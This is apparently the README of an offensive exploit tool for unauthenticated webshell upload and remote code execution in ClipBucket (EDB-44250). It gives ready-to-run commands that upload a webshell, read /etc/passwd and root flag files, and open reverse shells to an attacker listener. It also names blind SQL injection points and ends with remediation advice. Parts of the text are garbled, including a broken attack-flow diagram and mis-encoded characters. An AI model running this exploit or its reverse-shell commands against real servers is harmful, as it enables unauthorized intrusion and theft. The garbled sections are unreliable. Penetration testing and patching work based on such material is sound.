Share
## https://sploitus.com/exploit?id=81738E6F-592A-558F-886D-1F2C08F70045
# ClipBucket-EDB-44250

Unauthenticated Remote Code Execution in ClipBucket  -u  [options]
```

```
Options:
  -t             Target URL
  -u             HTTP Basic Auth         user:password  (if required)
  --cmd          Single OS command       print output and exit
  --revshell     Trigger reverse shell   to your listener
  --lhost        Listener IP             auto-detected from tun0
  --lport        Listener port           default: 4444
  --type         Shell type              bash ยท python3 ยท nc ยท mkfifo
  --fresh        Force new upload        ignore cached webshell
  --proxy        Route through proxy     http://127.0.0.1:8080
  --timeout      Request timeout         default: 15

Modes:
  No flag         โ†’  Interactive console  (command loop via webshell)
  --cmd "whoami"  โ†’  Single command, print output and exit
  --revshell      โ†’  OSCP-style reverse shell, start nc first
```

**Recommended workflow:**

```bash
# 1. Drop into interactive console (uploads webshell automatically)
python exploit.py -t http://10.10.11.50 -u admin:pass

# 2. Or run a single command directly
python exploit.py -t http://10.10.11.50 -u admin:pass --cmd "cat /etc/passwd"
python exploit.py -t http://10.10.11.50 -u admin:pass --cmd "cat /root/root.txt"

# 3. Get a proper shell when you need interactivity
#    Start your listener first: nc -lvnp 4444
python exploit.py -t http://10.10.11.50 -u admin:pass --revshell --lhost 10.10.14.5
python exploit.py -t http://10.10.11.50 -u admin:pass --revshell --lhost 10.10.14.5 --lport 9001 --type python3
```

The webshell path is cached after the first run. Subsequent executions reuse it without re-uploading (verified with a live probe first). Use `--fresh` to force a new upload.

**Interactive console commands:**

```
exploit> info          Show id, hostname, cwd, uname
exploit> run      Execute an OS command
exploit> revshell      Trigger reverse shell (prompts for lhost/lport)
exploit> webshell      Print the active webshell URL
exploit> help          Show command reference
exploit> exit          Close the console
```

Per-option help: `python exploit.py -h`

---

## How it works

### The vulnerability

ClipBucket's upload handlers โ€” `/actions/beats_uploader.php` and `/actions/photo_uploader.php` โ€” accept file uploads with no authentication, no extension filtering, and no content-type validation. Uploading a `.php` file works exactly like uploading an image. The file lands in a web-accessible directory and Apache serves it directly, including executing PHP.

The upload endpoint responds with a JSON object containing the real filename assigned by the server and the directory where it was stored:

```json
{"success":"yes","file_name":"1779640458a5d67e","extension":"php","file_directory":"CB_BEATS_UPLOAD_DIR"}
```

The exploit reads `file_name` + `extension` from that response to know exactly what to look for, then scans for directory listings to locate the real URL of the uploaded file. Once found, it verifies execution with a live probe before using the path.

### Attack flow

```
Attacker                          ClipBucket (PHP/Apache)
  โ”‚                                        โ”‚
  โ”‚โ”€โ”€ POST /actions/beats_uploader.php โ”€โ”€โ”€>โ”‚
  โ”‚   file=shell.php (PHP code)            โ”‚  No auth check
  โ”‚   plupload=1                           โ”‚  No extension filter
  โ”‚   name=file.php                        โ”‚  File saved to disk
  โ”‚                                        โ”‚
  โ”‚โ”‚
  โ”‚                                        โ”‚  Apache directory listing
  โ”‚.php?cmd=id โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€>โ”‚
  โ”‚                                        โ”‚  PHP executes the command
  โ”‚" http://TARGET/api/file_uploader.php
```

**Blind SQL Injection** โ€” `channelId` in `/actions/vote_channel.php` and `email`/`username` in `/ajax/commonAjax.php` are injectable. Time-based blind via `BENCHMARK()`.

---

## Remediation

```bash
# Update ClipBucket to Release 4902 or later
# https://github.com/arslancb/clipbucket/releases
```

If patching immediately is not possible:
- Block unauthenticated access to `/actions/beats_uploader.php` and `/actions/photo_uploader.php`
- Disable PHP execution in upload directories via `.htaccess` (`php_flag engine off`)
- Restrict directory listing for upload paths in Apache/Nginx config

---

## References

- [Exploit-DB EDB-44250](https://www.exploit-db.com/exploits/44250)
- [SEC Consult Advisory](https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html)
- [ClipBucket Releases](https://github.com/arslancb/clipbucket/releases)

---

> For authorized penetration testing and educational purposes only.